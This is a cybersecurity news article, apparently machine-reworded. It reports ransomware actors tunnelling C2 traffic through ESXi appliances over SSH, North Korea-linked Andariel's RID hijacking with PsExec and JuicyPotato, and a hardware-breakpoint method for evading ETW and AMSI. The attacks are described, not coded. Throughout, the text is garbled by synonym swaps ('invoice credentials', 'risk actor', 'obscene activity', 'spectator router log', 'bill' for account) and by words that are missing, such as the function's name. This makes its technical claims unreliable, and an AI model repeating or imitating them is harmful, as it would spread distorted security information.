Ransomware uses ESXi Systems to conduct C2 functions through shady SSH caves.

Jan 28, 2025Ravie LakshmananRansomware / Threat Intelligence

Ransomware attacks that target are also using the access to recycle the appliances as a conduit to pipe traffic to C2 infrastructure and remain hidden, according to cybersecurity researchers.

“ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely”, Sygnia researchers Aaron ( Zhongyuan ) Hau and Ren Jie Yow in a report published last week.

” Threat actors use these platforms by adopting ‘living-off-the-land ‘ methods and using native tools like SSH to create a SOCKS tunnel between their C2 servers and the compromised environment,” according to the report.

The goal is to blend in with reasonable traffic while maintaining long-term persistence on the damaged network with little to no security monitoring.

The cybersecurity firm claimed that ESXi systems were frequently compromised because they used invoice credentials or a known security flaw to circumvent identification protections. Consequently, the risk actors have been found to set up a hole using SSH or other tools with similar features.

” Since ESXi devices are adaptable and scarcely shutdown unexpectedly, this drilling serves as a semi-persistent secret within the network”, the scientists noted.

Sygnia has also raised the difficulties of keeping tabs on ESXi logs by highlighting the need to set up log forwarding so that all pertinent events can be gathered in one place for criminal investigations.

Companies are advised to check the following four log documents in order to identify problems that use SSH tunneling on ESXi appliances.

  • /var/log/shell. log ( ESXi shell activity log )
  • /var/log/hostd. log ( Host agent log )
  • /var/log/auth. log ( authentication log )
  • /var/log/vobd. log (VMware spectator router log )

Andariel Employs RID Hijacking

The development comes as the North Korea-linked group revealed an attack carried out by the AhnLab Security Intelligence Center ( ASEC ) that uses a method known as Relative Identifier ( ) hijacking to covertly modify the Windows Registry to grant a guest or low privileged account administrative rights during the following login.

The boldness tactic is shady because it exploits the fact that regular accounts are not subject to the same degree of surveillance as administrator accounts, allowing threat actors to engage in obscene activity while remaining unchecked.

However, the adversary must have already compromised a machine and possessed administrative or SYSTEM rights in order to carry out RID hijacking, which requires changing the standard account’s RID value to that of the Administrator account ( 5 000 ).

The risk actor is said to have created a new account and given it executive privileges using this method after obtaining Program privileges themselves using privilege increase tools like PsExec and JuicyPotato in the attack chain documented by ASEC.

The risk actor then used the” net localgroup” command to add the created consideration to the Remote Desktop Users team and Officials group, according to the company. The consideration can be accessed using RDP when an bill is added to the Remote Desktop Users team.

The risk actor’s bill is recognized as having the same privileges as the specific bill after the RID worth has been changed, enabling privilege escalation.

New Technique for EDR Evasion

In related news, it has also been discovered that an approach based on hardware breakpoints could be used to defy Windows ( ) detections, which provides a mechanism to log events raised by user-mode applications and kernel-mode drivers.

This entails using a native Windows work called , instead of SetThreadContext, to established test registers and avert triggering ETW checking and events that are parsed by EDRs to flag dubious activity, thus getting around telemetry that relies on SetThreadContext.

Attackers can connect functions and control monitoring in userland without directly patching the kernel, according to Praetorian researcher Rad Kawar, using hardware breakpoints at the CPU level, challenging conventional defenses.

This is significant because it highlights a tactic that adversaries may employ to prevent AMSI searching and keep stealth while implementing” patchless “hooks that prevent AMSI scanning and avoid ETW logging.”

Found this article interesting? Follow us on and Twitter to access more exclusive content we post.

Leave a Comment